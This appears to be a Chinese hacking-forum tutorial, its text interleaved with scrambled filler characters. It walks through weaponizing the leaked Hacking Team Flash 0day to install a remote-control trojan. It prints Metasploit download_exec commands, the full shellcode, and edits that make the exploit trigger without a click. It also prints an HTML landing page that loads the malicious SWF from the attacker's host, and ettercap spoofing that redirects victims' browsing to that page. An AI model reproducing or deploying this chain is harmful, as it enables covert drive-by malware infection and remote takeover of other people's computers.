|
2 i2 p( `+ f# J8 d' _& ~( G9 @' K
三、flash 0day之手工代码修改制作下载者实例入侵演示 7 w2 o" [* M8 f; a! ~7 }2 x
* w9 X7 i( q( ?2 J' S1 W* g ]# G$ ?$ a4 V
利用到的工具: * [1 o# A, f& @, j3 P" ~+ M
/ [ R' \7 s* x9 M
$ R* a T( j" |! d* O r; ]+ ^
Msf
4 z4 r) t& i& A B3 } ; J, w6 C. J6 I T
2 k, ~8 l- e1 B- I& v- { Ettercap
! W6 D) @" ~! R1 v) v
" @# ?5 Y C; b/ B( F2 c8 R/ z) ]
: B" ~" ~" f- c& @1 e$ w3 t1 y+ V% R Adobe Flash CS6
! G7 `1 Y4 O/ u& p7 P0 F
F& z ~3 T/ k- n! i
6 L t3 ]2 e( N' j Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 % I y/ q$ f. Q) h! j
5 ^+ e5 L2 S1 o0 [) G0 c
* }7 Z+ s2 ?6 D3 z1 P' i9 g/ g 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
5 g. Y% \7 y" c, i ' K- b) j" ^4 w+ y T
1 {/ [8 q* I" H* t% R 如图: : r5 J( v( z/ O& `# \
5 R! F$ z' F' k" c( z
h* x- A: G1 j& K
- m' c; u, \' O5 T& A
4 z: R% d7 c$ r V! ^. a9 `5 s/ o i
8 Y* h4 r, h1 g. ^
* T" |7 `2 z6 Z; P/ L% Q
" m! {7 ]3 H7 r [6 c 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: . |( H$ o, h! I) K6 M* u0 z2 |+ a1 ?4 H
' ~% A) h6 G( k% L5 T
% B& v/ ]; d+ b& F* F3 E) y
1 I# D7 ~7 o- v' r3 u5 P
! H7 j1 W% N- q" D& T
5 j+ b) B; V& n7 \5 K
! o. y% [7 ~& L. z) o
) t. J+ h9 @- l' _; C6 y, _- u9 x* f
% H2 T+ P/ i/ r5 Y; S 然后执行generate -t dword生成shellcode,如下:
d! C: W" g" J- n, T
1 z+ w+ ~6 E& X3 u2 ]* X( @
0 h# H2 |6 f6 M5 _ 3 |8 j4 P$ a2 X; U6 N
9 c% D8 d/ M$ g5 |4 [0 C
! j" K6 V; E( @3 t' C! n: Z2 U. |1 d0 B 复制代码到文本下便于我们一会编辑flash exp,如下:
- j3 s t3 o9 N0 v5 A- A5 i
" {0 v+ O) S5 M0 {6 Y0 f i: b, a# b" Q- S+ u( c) }
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
/ H$ d! k! ?1 P0 z. _: j9 R h 4 H; n3 y) t1 \, l7 Z( Z4 G& a! q
b" ^% D0 _# }8 r1 N% P7 b& r
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 0 s: ?1 T2 ^6 V& {8 D3 b/ Z
4 q: W3 ^# g: O8 g, ^
3 Z9 E1 E1 X$ \9 s# M: h3 D
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, & }6 `( J/ d. o- G/ o# Z a: v
6 g) s& G% w+ d- g# E1 B- u9 n' y2 e% b2 x
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
6 ] E% _- |' G
0 u; e" v: O8 \, G% d( m+ }. l) j8 A% ]; e: v* r9 e$ z
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
* O* {8 w# E2 k+ W9 s5 Z1 \1 R7 R 0 e% G3 R0 h7 D1 f2 s: k* t. v2 K4 R
& }+ h* l$ U2 C; `( H5 m. ^( r 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
# @: i! {5 o3 a! t [ - P8 X# D1 m. t$ q, R
1 t( G' g e; d) {0 G# E 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
4 { l) C7 ?, |: Z6 v I : o: G7 z4 V" E* |- z( o
( \* A& ]3 N. q 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 1 v. c! w$ z9 Z2 h
# X' C5 B k. }# x: X& w1 l8 ~2 x- J/ n6 `1 Z, k1 d, N6 Y
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, C3 B& x6 h; F0 l/ D5 R+ p
4 ?2 Q5 u M/ w3 p
; U0 _: D4 l( M2 I; z 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ' v- X; o* S3 i* _. J' y3 b$ A
7 n7 k7 A7 H9 A; |0 c" `, J1 m+ n* F" Z. I7 Q3 }% M% c& E- q
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, : V! p. e" S3 {
$ Y2 } s8 R& T; u0 ]
1 Q& C* D: R! q 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, % E! W0 B! L: E0 ] ~
1 m: G; k9 k3 }" ^4 A
5 D- ? ?; O" q A: i0 @ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
) D; w1 [* E, u" ~0 d5 l7 t7 D 6 t6 R R f! G- ~4 W, `' b/ Y
4 ^+ g$ L3 q+ g6 j4 M) U 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
( n0 ?$ m" c6 D# j$ g& z % Q6 q7 f6 [' }
6 |3 h0 l7 O+ M# H
0 Q! Z" A1 n3 P2 {# I! J/ {
% U0 d$ H' `# O# [8 Z& i7 A/ ^- v$ \# t# ^2 A2 J' P# f
M/ E2 J+ ?7 \% R4 Z* i
, c2 a& G7 z+ v ?1 T( g
. ` a- C+ z$ D( O* n# g/ Q 下面我们来修改flash 0day exp,需要修改三个文件,分别为: : J4 l3 S( h0 }$ D0 l$ e* u
" g0 [' J, U* z
9 T4 T5 O6 m8 u& P; Z! d* B 1 @" O% h! v) W5 l6 b& e
' ?6 L4 b8 S5 Q& e' C; ]
8 J5 ~! ?. t0 c 先修改ShellWin32.as,部分源代码如图: 6 y+ W( t3 ~ q7 v0 z( p1 O
' i1 ` ~0 g% f' [
2 G: h9 ^7 ~/ _# r- `! @0 f; } / ^; H ~" q! h3 v( f C4 Y
! e' h7 Q( g0 K9 O
3 X- j* Y7 J2 Y8 o 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: / z/ ?; q- G0 L8 a
/ J; h5 ~2 \( t+ s! C
4 g3 j( U9 B/ {" k
1 @6 }$ a; {1 t! @) M' y
6 i( j2 V+ P8 Y# D: S/ C5 ? w" j8 G: r0 W: S, _
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: . }7 }0 `4 `9 B }6 }
0 Z- S S4 X5 [# q( e9 \7 b5 g9 n" \3 w/ |5 V" I4 H6 j
" F" e. C7 H# o! E/ F: l/ ~3 F' e
+ U8 U: i, h+ v" i! d3 B
" Y7 `& A: ~& g1 R 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 0 P# H# Y: ?. V' I; I
) F' z8 Q* S9 B( u( S
1 z9 h4 {5 F, E/ c. J8 n/ ~9 x* ]
5 v* o: ?% Y. |9 w5 J/ [" k 0 h6 W# `7 X* v3 S
r+ t! d7 ^0 n+ M' n: N
& Z6 _: O( c$ a9 k8 T: J
x; k7 D% E" c! G/ X7 s4 E
% Z @9 A- r, Y
G3 u1 T# y" z
0 c0 x7 h1 F3 h _3 Y7 Y, [! u" V4 r
然后点保存,下面我们来编译一下,打开 Q6 { ^2 r" b
- G# {" |( x4 {( K/ G, \7 d, ^
# t& x' H* x D! _! Q: i4 s% O exp1.fla然后点文件-发布,看看编译没错误
G" d f7 @4 V1 D* I
8 K4 L, N" a4 ], k; D G5 a6 l% I! e8 z C8 R H, H! V
9 l: w9 X/ p/ J
& d) L: `: V {) N5 S8 L$ z$ W# x( ^; p
$ ^) [ u! M/ l4 r
. I) ~" y( k" j; A+ t7 Y: ~- h- \9 @, m% O8 I
" k- `& y ^% E( _. g* q
% E; \: H0 V) F2 x8 I! X
# i' N4 T5 v4 E( T 4 B/ p+ z* ]& Y% d/ S
: F7 }! E7 V2 ]+ u) a8 u+ `% I. ]% C5 O! |' }7 \
然后我们把生成的
+ r! Q8 x2 y2 e ~
1 B+ M: \; b7 z9 @- ?. {, ]$ M5 r$ ~5 M& n5 K5 c0 }; A' \
exp1.swf丢到kailinux 的/var/www/html下: 5 u0 ^5 c6 M: g$ \
& d9 g$ ]4 a4 X1 e
# x2 j, r/ B* D5 L8 V 然后把这段代码好好编辑一下 * P5 }# A4 k# K6 S, V" U
* D6 O' L9 Y6 \9 y* X$ G" i
6 Y# I) Z( U( b8 r4 \! W* g 2 v$ J7 |( q) S# e9 ^" U, {
; [3 ]9 g8 g3 g$ B0 b" f- _4 f, {5 Y: [
9 V' o- ^5 B3 e' j4 e
3 I. j1 }) `/ X ?& H$ X' a8 p L/ L5 a* ] m) a& o; y, _
. d1 F5 k8 D1 U7 ^) Y+ N/ ?
) S9 Z' M+ b( l# O# M9 d6 D: ?3 Q, J: Q# Z+ ?
# ^) N. {! c/ s; o, n4 l
. `; ]# c# F$ }% s# A
& D9 J$ [+ I& z
" B* l1 [0 k: }' r
* l" T7 T) K8 M4 F! Z# a% s" f! T2 [7 e$ C
8 F4 {+ t# W5 n& z9 y; u" \
$ j2 F) k& {' k
. ]/ W7 s* \" F3 q$ Y <!DOCTYPE html>
$ m/ ?0 u# s/ H) x, L4 R" g$ ]
' n2 W$ B' E" `; I' ]
5 H. u1 _- @4 _: k, p <html> * w. N+ y; R: O& K# G3 K; B$ \. o
+ K+ [7 H r1 w% M2 X0 D/ Y
; o+ ]) b8 J) }" l
<head>
5 K' ]' |, G- l Z8 m
, m d& n. x% m$ k0 R
# |2 Z; e7 ~3 Y# O; c! W4 Z <meta http-equiv="Content-Type" content="text/html; 9 `7 t! x6 _9 f6 `( t2 z& w
, U" ]' u4 |% u3 X3 t9 \% N S
. G% ]8 _ `& G d4 h charset=utf-8"/>
* e9 Q9 S* z! L
; w4 i& X& k$ R
. s# N& e3 j; ^% ^5 M </head> # N( m; M" l( t/ r- C: l
. e6 b# r0 I4 p S/ w, p9 |2 I+ q) d# i7 |
<body>
, T, w6 d) t5 Q7 x9 W% z6 a- r( p
! K6 _. j: v/ t9 ~
: W8 w* Y( m% w- S <h2> Please wait, the requested page is loading...</h2>
. i, N) s5 K$ H8 a+ Z0 A. N) U
( C! r% g# }8 b8 x u. K0 Y$ I; O7 y9 A; ~5 h' n
<br>
E2 K! s1 p1 _# s+ P. S8 i# r
) J0 w2 H; z1 S! ]
4 Z& w2 ~$ k$ [$ B' Q <OBJECT
9 h# |# T6 j) @% |* a& ~! m: r2 m2 m
! }, J0 L" Q' Y/ }; j0 X8 t9 L2 k9 R1 o$ W
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
$ x2 \/ ~1 F2 s8 D) y( E
! R. u/ Z7 k, E* ]. q5 q) ]' K0 h0 C5 O2 f/ Z3 ~
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ) N* G ]' q" C
4 b+ F7 I& V9 J' c: @* L
7 |3 ?( r1 i" R- W7 g </body> w9 ^: s- V" h# z8 x5 N9 d0 Q
4 \/ f' B* g# E3 d j% j; X/ {
E7 r$ l8 Q$ \4 r' N8 s, M+ w8 H <script>
* f& u3 z! W! O# F P4 y* ~6 H # r% W9 n9 \/ W0 X
. H7 Y& U1 C( c setTimeout(function () {
! U. G) i" M/ S# V# X3 M n ) {. k# N) k9 h9 B/ k, c8 w, A+ C! G
) t e& z' m" u$ M" [7 W3 o 0 m: ~9 M r* [" X, H. d/ L0 j
" o4 ?& ]8 n- i6 N
( y8 K: q& J. T) E1 z( S+ S window.location.reload(); - ^, o! m3 n. I b7 {2 h& N
0 I, K+ @6 x) e4 G' U& }
- P O; K* b3 u) {7 |4 [7 q }, 10000); " M$ s8 ?/ r( B6 D+ s' F5 f
. [, P$ b- M" s# k
6 X$ O& `- X, y6 y6 J
; y% R) N C( Q4 v( s9 G
3 K$ o" N0 P. z2 }# w+ k+ n" a" o7 T; f& G6 e
</script>
; d/ F& z2 Q6 @
, V W& ~% G; H1 u+ E
9 D: d1 }8 \/ H3 |) F </html>
8 V( t/ y* ^" k1 v# ?8 F4 @, U
4 {: p! h. L' u
/ t3 {/ o% L& a) ~) Q4 P9 D
9 H8 g7 S( A0 S q& V % j: j1 D$ N) k& I$ j4 k- Q7 F
, Y2 ^+ M3 d. G8 c
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
# K) E5 G" P/ I: f% a6 J
8 g" Y* q+ q, L* r, Y# g
+ z5 L q; f7 ^3 ~9 e; P9 g 8 e2 S. {7 f G5 i% |' w! t
: a6 a- ^' U3 \4 E4 d' x% s6 M
8 Y3 Z7 u- R) f' W2 ` / ?" ^0 e0 Y6 C% y j6 J4 C( b H
6 ]- }7 H) }1 u' T. V( M# M2 _; @# y7 p
. b: V. j' \" s, p9 G) ?* s6 A& N7 {8 i
; x/ R( ?2 T: b. P' o% x, d. y+ ]) j8 B- r" B$ m4 S
; W- Y" G4 `0 K5 M' l, k
; F7 i4 w. l8 ^7 C# o M* i
. y' Q% n) a+ o6 @0 w' F. d
( y) C5 }3 c( o. X t# N7 c & k) z) v' O+ u& S. u9 u
9 @- {8 |" _) h# a
下面我们用ettercap欺骗如图:
% p5 u% ~# e2 B4 d $ T* s7 B% @& r- _5 S' U
5 ]- @0 j5 x/ m; x# _$ o- E; J& o
4 G1 b4 ?* i& d0 m; X1 e
9 M5 Z2 F8 w4 e2 [" {" b; d: Y- j; T7 K1 |, w: r
4 s6 C( U* [1 X g1 B7 I" D! a5 O
; |# d s! w/ u+ j) c3 x& I7 ]
" Z3 \8 n o% P. r5 ? 下面我们随便访问个网站看看: / p$ ?" k1 L+ P# G G
9 F# I6 U6 p6 E7 h; ^3 H. M. ]2 x' c5 E
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
. N3 c/ k: Q5 F* S- s ; d# R$ l6 j; q! b1 R9 y4 d) K
# l6 q7 ~: S" E7 L$ J( K. p$ ^
0 j+ N7 m9 I" A% x( z+ @
- d8 Y% h% v$ J+ u. `. q9 k4 V
$ P/ S* ~" d$ L! m
我们看另一台,
g2 y) O7 @/ L+ K
& M8 P0 c% v9 H6 v
! n Z. R( p. q$ T+ ~# _ 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
' K8 X. D# X8 P |